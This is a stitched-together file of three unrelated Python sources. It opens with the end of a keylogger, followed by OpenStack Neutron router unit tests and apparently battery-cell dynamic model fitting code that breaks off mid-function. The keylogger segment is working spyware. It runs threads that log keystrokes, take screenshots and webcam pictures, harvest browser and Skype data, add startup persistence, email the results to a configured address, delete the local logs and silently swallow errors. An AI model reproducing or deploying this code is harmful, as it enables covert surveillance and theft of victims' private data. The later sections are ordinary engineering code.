ctype, encoding = mimetypes.guess_type(f)
if ctype is None or encoding is not None:
# No guess could be made, or the file is encoded (compressed), so
# use a generic bag-of-bits type.
ctype = 'application/octet-stream'
maintype, subtype = ctype.split('/', 1)
if maintype == 'text':
fp = open(f)
# Note: we should handle calculating the charset
part = MIMEText(fp.read(), _subtype=subtype)
fp.close()
elif maintype == 'image':
fp = open(f, 'rb')
part = MIMEImage(fp.read(), _subtype=subtype)
fp.close()
else:
fp = open(f, 'rb')
part = MIMEBase(maintype, subtype)
part.set_payload(fp.read())
fp.close()
part.add_header('Content-Disposition', 'attachment; filename="%s"' % f)
msg.attach(part)
try:
smtp.sendmail(From, to, msg.as_string())
open(file_name, 'w').close()
with open(file_name, 'w') as fl:
fl.write('### Keylogger - Log ###\n')
fl.close()
for fi in files[1:]:
os.remove(fi)
del files[:]
files.append("output.txt")
smtp.close()
except Exception:
pass
smtp.close()
else:
smtp.close()
class ThreadHandler:
def create_workers(self):
for _ in range(NUMBER_OF_THREADS):
t = Thread(target=self.work)
t.daemon = True
t.start()
def work(self):
x = queue.get()
if x == 1:
Startup().run()
if x == 2:
Keylogger().run()
if x == 3:
MailHandler().send_mail(FromConf, ToConf, passwordConf, intervalMail)
if x == 4:
time.sleep(2)
BrowserHandler().run()
if x == 5:
time.sleep(2)
Skype().run()
if x == 6:
Keylogger().screenshot(interval_screenshot)
if x == 7:
Keylogger().webcam_pic(interval_webcam)
queue.task_done()
def create_jobs(self):
for x in JOB_NUMBER:
queue.put(x)
queue.join()
def run(self):
self.create_workers()
self.create_jobs()
if __name__ == '__main__':
ThreadHandler().run()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.agent.common import config as agent_config
from neutron.agent.l3 import router_info
from neutron.agent.linux import ip_lib
from neutron.common import constants as l3_constants
from neutron.common import exceptions as n_exc
from neutron.openstack.common import uuidutils
from neutron.tests import base
_uuid = uuidutils.generate_uuid
class TestRouterInfo(base.BaseTestCase):
    """Exercises RouterInfo's kernel routing-table updates."""

    def setUp(self):
        super(TestRouterInfo, self).setUp()
        conf = agent_config.setup_conf()
        conf.use_namespaces = True
        self.ip_cls_p = mock.patch('neutron.agent.linux.ip_lib.IPWrapper')
        wrapper_cls = self.ip_cls_p.start()
        self.mock_ip = mock.MagicMock()
        wrapper_cls.return_value = self.mock_ip
        self.ri_kwargs = {'agent_conf': conf,
                          'interface_driver': mock.sentinel.interface_driver}

    def _check_agent_method_called(self, calls):
        """Assert each command in `calls` ran inside the router namespace."""
        self.mock_ip.netns.execute.assert_has_calls(
            [mock.call(cmd, check_exit_code=False) for cmd in calls],
            any_order=True)

    @staticmethod
    def _route_cmd(action, destination, nexthop):
        # The exact `ip route` argv the agent is expected to execute.
        return ['ip', 'route', action, 'to', destination, 'via', nexthop]

    def test_routing_table_update(self):
        ri = router_info.RouterInfo(_uuid(), {}, **self.ri_kwargs)
        ri.router = {}
        for destination in ('135.207.0.0/16', '135.207.111.111/32'):
            route = {'destination': destination, 'nexthop': '1.2.3.4'}
            for action in ('replace', 'delete'):
                ri._update_routing_table(action, route)
                self._check_agent_method_called(
                    [self._route_cmd(action, destination, '1.2.3.4')])

    def test_routes_updated(self):
        ri = router_info.RouterInfo(_uuid(), {}, **self.ri_kwargs)
        ri.router = {}
        nexthop = '10.100.10.30'
        route_31 = {'destination': '110.100.31.0/24', 'nexthop': nexthop}
        route_30 = {'destination': '110.100.30.0/24', 'nexthop': nexthop}

        # Starting from no routes, both desired routes are replaced in.
        ri.routes = []
        ri.router['routes'] = [route_31, route_30]
        ri.routes_updated()
        self._check_agent_method_called(
            [self._route_cmd('replace', '110.100.30.0/24', nexthop),
             self._route_cmd('replace', '110.100.31.0/24', nexthop)])

        # Dropping one route from the desired set deletes it.
        ri.router['routes'] = [route_30]
        ri.routes_updated()
        self._check_agent_method_called(
            [self._route_cmd('delete', '110.100.31.0/24', nexthop)])

        # Emptying the desired set deletes the remaining route.
        ri.router['routes'] = []
        ri.routes_updated()
        self._check_agent_method_called(
            [self._route_cmd('delete', '110.100.30.0/24', nexthop)])
class BasicRouterTestCaseFramework(base.BaseTestCase):
    """Shared fixture that builds a RouterInfo around a (mock) router."""

    def _create_router(self, router=None, **kwargs):
        """Return a RouterInfo; `router` defaults to a fresh MagicMock."""
        self.agent_conf = mock.Mock()
        # NOTE The use_namespaces config will soon be deprecated
        self.agent_conf.use_namespaces = True
        self.router_id = _uuid()
        return router_info.RouterInfo(self.router_id,
                                      router or mock.MagicMock(),
                                      self.agent_conf,
                                      mock.sentinel.interface_driver,
                                      **kwargs)
class TestBasicRouterOperations(BasicRouterTestCaseFramework):
    """Unit tests for RouterInfo floating-IP bookkeeping and NAT rules."""

    def test_get_floating_ips(self):
        """get_floating_ips returns the fip list held by the router dict."""
        router = mock.MagicMock()
        router.get.return_value = [mock.sentinel.floating_ip]
        ri = self._create_router(router)
        fips = ri.get_floating_ips()
        self.assertEqual([mock.sentinel.floating_ip], fips)

    def test_process_floating_ip_nat_rules(self):
        """NAT rules are cleared, re-added per fip, then applied once."""
        ri = self._create_router()
        fips = [{'fixed_ip_address': mock.sentinel.ip,
                 'floating_ip_address': mock.sentinel.fip}]
        ri.get_floating_ips = mock.Mock(return_value=fips)
        ri.iptables_manager = mock.MagicMock()
        ipv4_nat = ri.iptables_manager.ipv4['nat']
        ri.floating_forward_rules = mock.Mock(
            return_value=[(mock.sentinel.chain, mock.sentinel.rule)])
        ri.process_floating_ip_nat_rules()
        # Be sure that the rules are cleared first and apply is called last
        self.assertEqual(mock.call.clear_rules_by_tag('floating_ip'),
                         ipv4_nat.mock_calls[0])
        self.assertEqual(mock.call.apply(), ri.iptables_manager.mock_calls[-1])
        # Be sure that add_rule is called somewhere in the middle
        ipv4_nat.add_rule.assert_called_once_with(mock.sentinel.chain,
                                                  mock.sentinel.rule,
                                                  tag='floating_ip')

    def test_process_floating_ip_nat_rules_removed(self):
        """With no fips, rules are cleared and applied but none are added."""
        ri = self._create_router()
        ri.get_floating_ips = mock.Mock(return_value=[])
        ri.iptables_manager = mock.MagicMock()
        ipv4_nat = ri.iptables_manager.ipv4['nat']
        ri.process_floating_ip_nat_rules()
        # Be sure that the rules are cleared first and apply is called last
        self.assertEqual(mock.call.clear_rules_by_tag('floating_ip'),
                         ipv4_nat.mock_calls[0])
        self.assertEqual(mock.call.apply(), ri.iptables_manager.mock_calls[-1])
        # No fips -> nothing should have been added in between
        self.assertFalse(ipv4_nat.add_rule.called)

    def _test_add_fip_addr_to_device_error(self, device):
        # Helper: try to add a fip address to `device` and return the
        # success flag from _add_fip_addr_to_device.
        ri = self._create_router()
        ip = '15.1.2.3'
        result = ri._add_fip_addr_to_device(
            {'id': mock.sentinel.id, 'floating_ip_address': ip}, device)
        device.addr.add.assert_called_with(ip + '/32')
        return result

    def test__add_fip_addr_to_device(self):
        """A clean device add reports success."""
        result = self._test_add_fip_addr_to_device_error(mock.Mock())
        self.assertTrue(result)

    def test__add_fip_addr_to_device_error(self):
        """A RuntimeError from the device is reported as failure."""
        device = mock.Mock()
        device.addr.add.side_effect = RuntimeError
        result = self._test_add_fip_addr_to_device_error(device)
        self.assertFalse(result)

    def test_process_snat_dnat_for_fip(self):
        """NAT-rule failures surface as FloatingIpSetupException."""
        ri = self._create_router()
        ri.process_floating_ip_nat_rules = mock.Mock(side_effect=Exception)
        self.assertRaises(n_exc.FloatingIpSetupException,
                          ri.process_snat_dnat_for_fip)
        ri.process_floating_ip_nat_rules.assert_called_once_with()

    def test_put_fips_in_error_state(self):
        """Every fip on the router is mapped to the ERROR status."""
        ri = self._create_router()
        ri.router = mock.Mock()
        ri.router.get.return_value = [{'id': mock.sentinel.id1},
                                      {'id': mock.sentinel.id2}]
        statuses = ri.put_fips_in_error_state()
        # BUG FIX: the expected value used to be wrapped in a list and
        # compared with assertNotEqual, which can never fail (a list is
        # never equal to the returned status dict), so the test verified
        # nothing.  Compare the status dict for equality instead.
        expected = {mock.sentinel.id1: l3_constants.FLOATINGIP_STATUS_ERROR,
                    mock.sentinel.id2: l3_constants.FLOATINGIP_STATUS_ERROR}
        self.assertEqual(expected, statuses)

    def test_configure_fip_addresses(self):
        """Address-processing failures surface as FloatingIpSetupException."""
        ri = self._create_router()
        ri.process_floating_ip_addresses = mock.Mock(
            side_effect=Exception)
        self.assertRaises(n_exc.FloatingIpSetupException,
                          ri.configure_fip_addresses,
                          mock.sentinel.interface_name)
        ri.process_floating_ip_addresses.assert_called_once_with(
            mock.sentinel.interface_name)

    def test_get_router_cidrs_returns_cidrs(self):
        """get_router_cidrs returns the set of cidrs on the device."""
        ri = self._create_router()
        addresses = ['15.1.2.2/24', '15.1.2.3/32']
        device = mock.MagicMock()
        device.addr.list.return_value = [{'cidr': addresses[0]},
                                         {'cidr': addresses[1]}]
        self.assertEqual(set(addresses), ri.get_router_cidrs(device))
@mock.patch.object(ip_lib, 'IPDevice')
class TestFloatingIpWithMockDevice(BasicRouterTestCaseFramework):
    """Floating-IP address processing with ip_lib.IPDevice patched out."""

    def _fake_fip(self, fip_id, **extra):
        # Minimal floating-ip payload as the l3 agent receives it.
        fip = {'id': fip_id,
               'port_id': _uuid(),
               'floating_ip_address': '15.1.2.3',
               'fixed_ip_address': '192.168.0.2'}
        fip.update(extra)
        return fip

    def test_process_floating_ip_addresses_remap(self, IPDevice):
        fip_id = _uuid()
        device = mock.Mock()
        IPDevice.return_value = device
        device.addr.list.return_value = [{'cidr': '15.1.2.3/32'}]

        ri = self._create_router()
        ri.get_floating_ips = mock.Mock(
            return_value=[self._fake_fip(fip_id)])
        fip_statuses = ri.process_floating_ip_addresses(
            mock.sentinel.interface_name)

        # Address already present on the device: fip goes ACTIVE and no
        # address is added or removed.
        self.assertEqual({fip_id: l3_constants.FLOATINGIP_STATUS_ACTIVE},
                         fip_statuses)
        self.assertFalse(device.addr.add.called)
        self.assertFalse(device.addr.delete.called)

    def test_process_router_with_disabled_floating_ip(self, IPDevice):
        fip_id = _uuid()
        ri = self._create_router()
        ri.floating_ips = [self._fake_fip(fip_id)]
        ri.get_floating_ips = mock.Mock(return_value=[])

        fip_statuses = ri.process_floating_ip_addresses(
            mock.sentinel.interface_name)

        # A fip that is no longer reported gets no status entry at all.
        self.assertIsNone(fip_statuses.get(fip_id))

    def test_process_router_floating_ip_with_device_add_error(self, IPDevice):
        device = mock.Mock(side_effect=RuntimeError)
        IPDevice.return_value = device
        device.addr.list.return_value = []
        fip_id = _uuid()
        ri = self._create_router()
        ri.add_floating_ip = mock.Mock(
            return_value=l3_constants.FLOATINGIP_STATUS_ERROR)
        ri.get_floating_ips = mock.Mock(
            return_value=[self._fake_fip(fip_id, status='DOWN')])

        fip_statuses = ri.process_floating_ip_addresses(
            mock.sentinel.interface_name)

        # add_floating_ip reported ERROR; that status must be propagated.
        self.assertEqual({fip_id: l3_constants.FLOATINGIP_STATUS_ERROR},
                         fip_statuses)

    # TODO(mrsmith): refactor for DVR cases
    def test_process_floating_ip_addresses_remove(self, IPDevice):
        device = mock.Mock()
        IPDevice.return_value = device
        device.addr.list.return_value = [{'cidr': '15.1.2.3/32'}]

        ri = self._create_router()
        ri.remove_floating_ip = mock.Mock()
        ri.router.get = mock.Mock(return_value=[])

        fip_statuses = ri.process_floating_ip_addresses(
            mock.sentinel.interface_name)
        # No fips desired: the stale address is removed and the returned
        # status map is empty.
        self.assertEqual({}, fip_statuses)
        ri.remove_floating_ip.assert_called_once_with(device, '15.1.2.3/32')
|
|
"""
Functions used by the dyn_model
"""
# Modules
# ------------------------------------------------------------------------------
import ipdb
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import fminbound, nnls, minimize_scalar
from scipy.signal import dlsim, dlti
from models import ModelDyn
# Functions
# ------------------------------------------------------------------------------
def OCVfromSOCtemp(soc, temp, model):
    """Open-circuit-voltage lookup with linear interpolation/extrapolation.

    Evaluates OCV(soc, temp) = OCV0(soc) + temp*OCVrel(soc) from the model's
    uniformly spaced SOC table.  Values below/above the table range are
    linearly extrapolated off the low/high end; NaN SOC entries yield 0 V.

    soc   : scalar or array of state-of-charge values
    temp  : scalar temperature (deg C)
    model : object with uniformly spaced SOC, OCV0, OCVrel table attributes
    Returns a 1-D numpy array (even for scalar input).
    """
    SOC = model.SOC          # table breakpoints (assumed uniformly spaced)
    OCV0 = model.OCV0        # OCV at 0 degC
    OCVrel = model.OCVrel    # per-degree temperature correction
    # if soc is scalar then make it a vector
    soccol = np.asarray(soc)
    if soccol.ndim == 0:
        soccol = soccol[None]
    tempcol = temp * np.ones(np.size(soccol))

    diffSOC = SOC[1] - SOC[0]           # spacing between SOC points - assume uniform
    ocv = np.zeros(np.size(soccol))     # initialize output to zero
    I1, = np.where(soccol <= SOC[0])    # indices of socs below model-stored data
    I2, = np.where(soccol >= SOC[-1])   # and of socs above model-stored data
    I3, = np.where((soccol > SOC[0]) & (soccol < SOC[-1]))  # the rest of them
    I6 = np.isnan(soccol)               # if input is "not a number" for any locations

    # BUG FIX: the original guards were `if I1.any():` / `if I2.any():`.
    # I1/I2 are arrays of *indices*, so any() tests the index values, not
    # emptiness -- when the only out-of-range sample sat at index 0 the
    # extrapolation was silently skipped and 0 V returned.  Test .size.
    # for voltages less than lowest stored soc datapoint, extrapolate off
    # low end of table
    if I1.size:
        dv = (OCV0[1] + tempcol*OCVrel[1]) - (OCV0[0] + tempcol*OCVrel[0])
        ocv[I1] = (soccol[I1] - SOC[0])*dv[I1]/diffSOC + OCV0[0] + tempcol[I1]*OCVrel[0]

    # for voltages greater than highest stored soc datapoint, extrapolate off
    # high end of table
    if I2.size:
        dv = (OCV0[-1] + tempcol*OCVrel[-1]) - (OCV0[-2] + tempcol*OCVrel[-2])
        ocv[I2] = (soccol[I2] - SOC[-1])*dv[I2]/diffSOC + OCV0[-1] + tempcol[I2]*OCVrel[-1]

    # for normal soc range, manually interpolate (10x faster than "interp1")
    I4 = (soccol[I3] - SOC[0])/diffSOC  # using linear interpolation
    I5 = np.floor(I4)
    I5 = I5.astype(int)
    I45 = I4 - I5
    omI45 = 1 - I45
    ocv[I3] = OCV0[I5]*omI45 + OCV0[I5+1]*I45
    ocv[I3] = ocv[I3] + tempcol[I3]*(OCVrel[I5]*omI45 + OCVrel[I5+1]*I45)
    ocv[I6] = 0  # replace NaN SOCs with zero voltage
    return ocv
def SISOsubid(y, u, n):
    """
    Identify state-space "A" matrix from input-output data.
    y: vector of measured outputs
    u: vector of measured inputs
    n: number of poles in solution
    A: discrete-time state-space state-transition matrix.

    Theory from "Subspace Identification for Linear Systems Theory - Implementation
    - Applications" Peter Van Overschee / Bart De Moor (VODM) Kluwer Academic
    Publishers, 1996. Combined algorithm: Figure 4.8 page 131 (robust). Robust
    implementation: Figure 6.1 page 169.

    Code adapted from "subid.m" in "Subspace Identification for Linear Systems"
    toolbox on MATLAB CENTRAL file exchange, originally by Peter Van Overschee,
    Dec. 1995
    """
    ny = len(y)     # number of samples
    i = 2*n         # number of block rows (must exceed the model order n)
    twoi = 4*n      # 2*i
    # Determine the number of columns in the Hankel matrices
    j = ny - twoi + 1
    # Make Hankel matrices Y and U (one shifted row of data per block row)
    Y = np.zeros((twoi, j))
    U = np.zeros((twoi, j))
    for k in range(2*i):
        Y[k] = y[k:k+j]
        U[k] = u[k:k+j]
    # Compute the R factor
    UY = np.concatenate((U, Y))  # combine U and Y into one array
    _, r = np.linalg.qr(UY.T)    # QR decomposition
    R = r.T                      # transpose of upper triangle

    # STEP 1: Calculate oblique and orthogonal projections
    # ------------------------------------------------------------------
    Rf = R[-i:]                                 # future outputs
    Rp = np.concatenate((R[:i], R[2*i:3*i]))    # past inputs and outputs
    Ru = R[i:twoi, :twoi]                       # future inputs
    # Perpendicular future outputs: project Rf onto the orthogonal
    # complement of the future-input row space (lstsq == MATLAB "/").
    RfRu = np.linalg.lstsq(Ru.T, Rf[:, :twoi].T, rcond=None)[0].T
    RfRuRu = RfRu.dot(Ru)
    tm1 = Rf[:, :twoi] - RfRuRu
    tm2 = Rf[:, twoi:4*i]
    Rfp = np.concatenate((tm1, tm2), axis=1)    # perpendicular future outputs
    # Perpendicular past inputs and outputs, same projection applied to Rp.
    RpRu = np.linalg.lstsq(Ru.T, Rp[:, :twoi].T, rcond=None)[0].T
    RpRuRu = RpRu.dot(Ru)
    tm3 = Rp[:, :twoi] - RpRuRu
    tm4 = Rp[:, twoi:4*i]
    Rpp = np.concatenate((tm3, tm4), axis=1)    # perpendicular past inputs and outputs

    # The oblique projection is computed as (6.1) in VODM, page 166.
    # obl/Ufp = Yf/Ufp * pinv(Wp/Ufp) * (Wp/Ufp)
    # The extra projection on Ufp (Uf perpendicular) tends to give
    # better numerical conditioning (see algo on VODM page 131)
    # Funny rank check (SVD takes too long)
    # This check is needed to avoid rank deficiency warnings

    nmRpp = np.linalg.norm(Rpp[:, 3*i-3:-i], ord='fro')
    if nmRpp < 1e-10:
        # oblique projection as (Rfp*pinv(Rpp')') * Rp
        Ob = Rfp.dot(np.linalg.pinv(Rpp.T).T).dot(Rp)
    else:
        # oblique projection as (Rfp/Rpp) * Rp
        Ob = (np.linalg.lstsq(Rpp.T, Rfp.T, rcond=None)[0].T).dot(Rp)

    # STEP 2: Compute weighted oblique projection and its SVD
    #         Extra projection of Ob on Uf perpendicular
    # ------------------------------------------------------------------
    ObRu = np.linalg.lstsq(Ru.T, Ob[:, :twoi].T, rcond=None)[0].T
    ObRuRu = ObRu.dot(Ru)
    tm5 = Ob[:, :twoi] - ObRuRu
    tm6 = Ob[:, twoi:4*i]
    WOW = np.concatenate((tm5, tm6), axis=1)
    U, S, _ = np.linalg.svd(WOW, full_matrices=False)
    ss = S      # In np.linalg.svd S is already the diagonal, generally ss = diag(S)

    # STEP 3: Partitioning U into U1 and U2 (the latter is not used)
    # ------------------------------------------------------------------
    U1 = U[:, :n]       # determine U1

    # STEP 4: Determine gam = Gamma(i) and gamm = Gamma(i-1)
    # ------------------------------------------------------------------
    gam = U1 @ np.diag(np.sqrt(ss[:n]))
    gamm = gam[0:(i-1),:]
    gam_inv = np.linalg.pinv(gam)               # pseudo inverse of gam
    gamm_inv = np.linalg.pinv(gamm)             # pseudo inverse of gamm

    # STEP 5: Determine A matrix (also C, which is not used)
    # ------------------------------------------------------------------
    tm7 = np.concatenate((gam_inv @ R[3*i:4*i, 0:3*i], np.zeros((n,1))), axis=1)
    tm8 = R[i:twoi, 0:3*i+1]
    Rhs = np.vstack((tm7, tm8))
    tm9 = gamm_inv @ R[3*i+1:4*i, 0:3*i+1]
    tm10 = R[3*i:3*i+1, 0:3*i+1]
    Lhs = np.vstack((tm9, tm10))
    sol = np.linalg.lstsq(Rhs.T, Lhs.T, rcond=None)[0].T    # solve least squares for [A; C]
    A = sol[0:n, 0:n]                                       # extract A
    return A
def minfn(data, model, theTemp, doHyst):
    """
    Using an assumed value for gamma (already stored in the model), find optimum
    values for remaining cell parameters, and compute the RMS error between true
    and predicted cell voltage
    """
    alltemps = [d.temp for d in data]
    # NOTE(review): np.where(...)[0] is the index array; the trailing comma
    # unpack assumes exactly one dataset matches theTemp -- verify caller.
    ind, = np.where(np.array(alltemps) == theTemp)[0]

    G = abs(model.GParam[ind])
    Q = abs(model.QParam[ind])
    eta = abs(model.etaParam[ind])
    RC = abs(model.RCParam[ind])
    numpoles = len(RC)

    ik = data[ind].s1.current.copy()
    vk = data[ind].s1.voltage.copy()
    tk = np.arange(len(vk))

    # Scale charge (negative) currents by the coulombic efficiency eta.
    etaik = ik.copy()
    etaik[ik < 0] = etaik[ik < 0] * eta

    # Build hysteresis state hh and instantaneous-sign state sik sample by
    # sample (enhanced self-correcting model recursion).
    hh = 0*ik
    sik = 0*ik
    fac = np.exp(-abs(G * etaik/(3600*Q)))

    for k in range(1, len(ik)):
        hh[k] = (fac[k-1]*hh[k-1]) - ((1-fac[k-1])*np.sign(ik[k-1]))
        sik[k] = np.sign(ik[k])
        if abs(ik[k]) < Q/100:
            # Hold the previous sign through near-zero currents.
            sik[k] = sik[k-1]

    # First modeling step: Compute error with model = OCV only
    vest1 = data[ind].OCV
    verr = vk - vest1

    # Second modeling step: Compute time constants in "A" matrix
    y = -np.diff(verr)
    u = np.diff(etaik)
    A = SISOsubid(y, u, numpoles)

    # Modify results to ensure real, preferably distinct, between 0 and 1
    eigA = np.linalg.eigvals(A)
    # NOTE(review): the random jitter below makes results non-deterministic
    # between runs -- presumably intentional to split complex pairs; confirm.
    eigAr = eigA + 0.001 * np.random.normal(loc=0.0, scale=1.0, size=eigA.shape)
    eigA[eigA != np.conj(eigA)] = abs(eigAr[eigA != np.conj(eigA)])  # Make sure real
    eigA = np.real(eigA)                 # Make sure real
    eigA[eigA<0] = abs(eigA[eigA<0])     # Make sure in range
    eigA[eigA>1] = 1 / eigA[eigA>1]
    RCfact = np.sort(eigA)
    RCfact = RCfact[-numpoles:]
    RC = -1 / np.log(RCfact)

    # Compute RC time constants as Plett's Matlab ESCtoolbox
    # nup = numpoles
    # while 1:
    #     A = SISOsubid(y, u, nup)

    #     # Modify results to ensure real, preferably distinct, between 0 and 1

    #     eigA = np.linalg.eigvals(A)
    #     eigA = np.real(eigA[eigA == np.conj(eigA)])  # Make sure real
    #     eigA = eigA[(eigA>0) & (eigA<1)]             # Make sure in range
    #     okpoles = len(eigA)
    #     nup = nup + 1
    #     if okpoles >= numpoles:
    #         break
    #     # print(nup)

    # RCfact = np.sort(eigA)
    # RCfact = RCfact[-numpoles:]
    # RC = -1 / np.log(RCfact)

    # Simulate the R-C filters to find R-C currents
    stsp = dlti(np.diag(RCfact), np.vstack(1-RCfact), np.eye(numpoles), np.zeros((numpoles, 1)))
    [tout, vrcRaw, xout] = dlsim(stsp, etaik)

    # Third modeling step: Hysteresis parameters
    if doHyst:
        # Non-negative least squares fit of [M, M0, R0, Rk...] to the error.
        H = np.column_stack((hh, sik, -etaik, -vrcRaw))
        W = nnls(H, verr)
        M = W[0][0]
        M0 = W[0][1]
        R0 = W[0][2]
        Rfact = W[0][3:].T
    else:
        # No hysteresis: ordinary least squares for [R0, Rk...] only.
        H = np.column_stack((-etaik, -vrcRaw))
        W = np.linalg.lstsq(H,verr, rcond=None)[0]
        M = 0
        M0 = 0
        R0 = W[0]
        Rfact = W[1:].T

    idx, = np.where(np.array(model.temps) == data[ind].temp)[0]
    model.R0Param[idx] = R0
    model.M0Param[idx] = M0
    model.MParam[idx] = M
    model.RCParam[idx] = RC.T
    model.RParam[idx] = Rfact.T

    # Full dynamic-model voltage estimate and residual.
    vest2 = vest1 + M*hh + M0*sik - R0*etaik - vrcRaw @ Rfact.T
    verr = vk - vest2

    # plot voltages
    plt.figure(1)
    plt.plot(tk[::10]/60, vk[::10], label='voltage')
    plt.plot(tk[::10]/60, vest1[::10], label='vest1 (OCV)')
    plt.plot(tk[::10]/60, vest2[::10], label='vest2 (DYN)')
    plt.xlabel('Time (min)')
    plt.ylabel('Voltage (V)')
    plt.title(f'Voltage and estimates at T = {data[ind].temp} C')
    plt.legend(loc='best', numpoints=1)
    #plt.show()

    # plot modeling errors
    plt.figure(2)
    plt.plot(tk[::10]/60, verr[::10], label='verr')
    plt.xlabel('Time (min)')
    plt.ylabel('Error (V)')
    plt.title(f'Modeling error at T = {data[ind].temp} C')
    #plt.show()

    # Compute RMS error only on data roughly in 5% to 95% SOC
    v1 = OCVfromSOCtemp(0.95, data[ind].temp, model)[0]
    v2 = OCVfromSOCtemp(0.05, data[ind].temp, model)[0]
    # First sample indices where voltage drops below the 95% / 5% OCV levels.
    N1 = np.where(vk < v1)[0][0]
    N2 = np.where(vk < v2)[0][0]

    rmserr = np.sqrt(np.mean(verr[N1:N2]**2))
    cost = np.sum(rmserr)
    print(f'RMS error = {cost*1000:.2f} mV')

    return cost, model
def optfn(x, data, model, theTemp, doHyst):
    """Scalar-cost wrapper used by the optimizer.

    Stores abs(x) as the hysteresis gamma for the matching temperature and
    returns the RMS voltage error computed by minfn.
    """
    temp_idx, = np.where(np.array(model.temps) == theTemp)
    model.GParam[temp_idx] = abs(x)
    rms_cost, _ = minfn(data, model, theTemp, doHyst)
    return rms_cost
def processDynamic(data, modelocv, numpoles, doHyst):
    """
    Technical note: PROCESSDYNAMIC assumes that specific Arbin test scripts have
    been executed to generate the input files. "makeMATfiles.m" converts the raw
    Excel data files into "MAT" format where the MAT files have fields for time,
    step, current, voltage, chgAh, and disAh for each script run.

    The results from three scripts are required at every temperature.
    The steps in each script file are assumed to be:
    Script 1 (thermal chamber set to test temperature):
        Step 1: Rest @ 100% SOC to acclimatize to test temperature
        Step 2: Discharge @ 1C to reach ca. 90% SOC
        Step 3: Repeatedly execute dynamic profiles (and possibly intermediate
        rests) until SOC is around 10%
    Script 2 (thermal chamber set to 25 degC):
        Step 1: Rest ca. 10% SOC to acclimatize to 25 degC
        Step 2: Discharge to min voltage (ca. C/3)
        Step 3: Rest
        Step 4: Constant voltage at vmin until current small (ca. C/30)
        Steps 5-7: Dither around vmin
        Step 8: Rest
    Script 3 (thermal chamber set to 25 degC):
        Step 2: Charge @ 1C to max voltage
        Step 3: Rest
        Step 4: Constant voltage at vmax until current small (ca. C/30)
        Steps 5-7: Dither around vmax
        Step 8: Rest

    All other steps (if present) are ignored by PROCESSDYNAMIC. The time step
    between data samples must be uniform -- we assume a 1s sample period in this
    code.

    The inputs:
    - data: An array, with one entry per temperature to be processed.
        One of the array entries must be at 25 degC. The fields of "data" are:
        temp (the test temperature), script1, script 2, and script 3, where the
        latter comprise data collected from each script. The sub-fields of
        these script structures that are used by PROCESSDYNAMIC are the
        vectors: current, voltage, chgAh, and disAh
    - model: The output from processOCV, comprising the OCV model
    - numpoles: The number of R-C pairs in the model
    - doHyst: 0 if no hysteresis model desired; 1 if hysteresis desired

    The output:
    - model: A modified model, which now contains the dynamic fields filled in.
    """
    # used by minimize_scalar later on
    options = {
        'xatol': 1e-08,
        'maxiter': 1e5,
        'disp': 0
    }

    # Step 1: Compute capacity and coulombic efficiency for every test
    # ------------------------------------------------------------------
    alltemps = [d.temp for d in data]
    alletas = np.zeros(len(alltemps))
    allQs = np.zeros(len(alltemps))

    # NOTE(review): the trailing-comma unpacks assume exactly one 25 degC
    # dataset is present -- verify against the input data.
    ind25, = np.where(np.array(alltemps) == 25)[0]
    not25, = np.where(np.array(alltemps) != 25)

    # Process the 25 degC reference test first: eta and Q at 25 degC.
    k = ind25

    totDisAh = data[k].s1.disAh[-1] + data[k].s2.disAh[-1] + data[k].s3.disAh[-1]
    totChgAh = data[k].s1.chgAh[-1] + data[k].s2.chgAh[-1] + data[k].s3.chgAh[-1]
    eta25 = totDisAh/totChgAh
    data[k].eta = eta25
    alletas[k] = eta25
    # Rescale all charge Ah by the coulombic efficiency.
    data[k].s1.chgAh = data[k].s1.chgAh * eta25
    data[k].s2.chgAh = data[k].s2.chgAh * eta25
    data[k].s3.chgAh = data[k].s3.chgAh * eta25

    Q25 = data[k].s1.disAh[-1] + data[k].s2.disAh[-1] - data[k].s1.chgAh[-1] - data[k].s2.chgAh[-1]
    data[k].Q = Q25
    allQs[k] = Q25

    eta25 = np.mean(alletas[ind25])

    # Non-25 degC tests: scripts 2 and 3 ran at 25 degC, so they use eta25;
    # script 1 gets its own per-temperature eta.
    for k in not25:
        data[k].s2.chgAh = data[k].s2.chgAh*eta25
        data[k].s3.chgAh = data[k].s3.chgAh*eta25
        eta = (data[k].s1.disAh[-1] + data[k].s2.disAh[-1] + data[k].s3.disAh[-1] - data[k].s2.chgAh[-1] - data[k].s3.chgAh[-1])/data[k].s1.chgAh[-1]

        data[k].s1.chgAh = eta*data[k].s1.chgAh
        data[k].eta = eta
        alletas[k] = eta

        Q = data[k].s1.disAh[-1] + data[k].s2.disAh[-1] - data[k].s1.chgAh[-1] - data[k].s2.chgAh[-1]
        data[k].Q = Q
        allQs[k] = Q

    modeldyn = ModelDyn()
    modeldyn.temps = alltemps
    modeldyn.etaParam = alletas
    modeldyn.QParam = allQs

    # Step 2: Compute OCV for "discharge portion" of test
    # ------------------------------------------------------------------
    for k, _ in enumerate(data):
        etaParam = modeldyn.etaParam[k]
        etaik = data[k].s1.current.copy()
        etaik[etaik < 0] = etaParam*etaik[etaik < 0]
        # SOC trajectory by coulomb counting (1 s sample period assumed).
        data[k].Z = 1 - np.cumsum(etaik) * 1/(data[k].Q * 3600)
        data[k].OCV = OCVfromSOCtemp(data[k].Z, alltemps[k], modelocv)

    # Step 3: Now, optimize!
    # ------------------------------------------------------------------
    modeldyn.GParam = np.zeros(len(modeldyn.temps))     # gamma hysteresis parameter
    modeldyn.M0Param = np.zeros(len(modeldyn.temps))    # M0 hysteresis parameter
    modeldyn.MParam = np.zeros(len(modeldyn.temps))     # M hysteresis parameter
    modeldyn.R0Param = np.zeros(len(modeldyn.temps))    # R0 ohmic resistance parameter
    modeldyn.RCParam = np.zeros((len(modeldyn.temps), numpoles))    # time constant
    modeldyn.RParam = np.zeros((len(modeldyn.temps), numpoles))     # Rk

    modeldyn.SOC = modelocv.SOC         # copy SOC values from OCV model
    modeldyn.OCV0 = modelocv.OCV0       # copy OCV0 values from OCV model
    modeldyn.OCVrel = modelocv.OCVrel   # copy OCVrel values from OCV model

    for theTemp in range(len(modeldyn.temps)):
        temp = modeldyn.temps[theTemp]
        print('Processing temperature', temp, 'C')

        if doHyst:
            # Bounded 1-D search for gamma; optfn stores the remaining
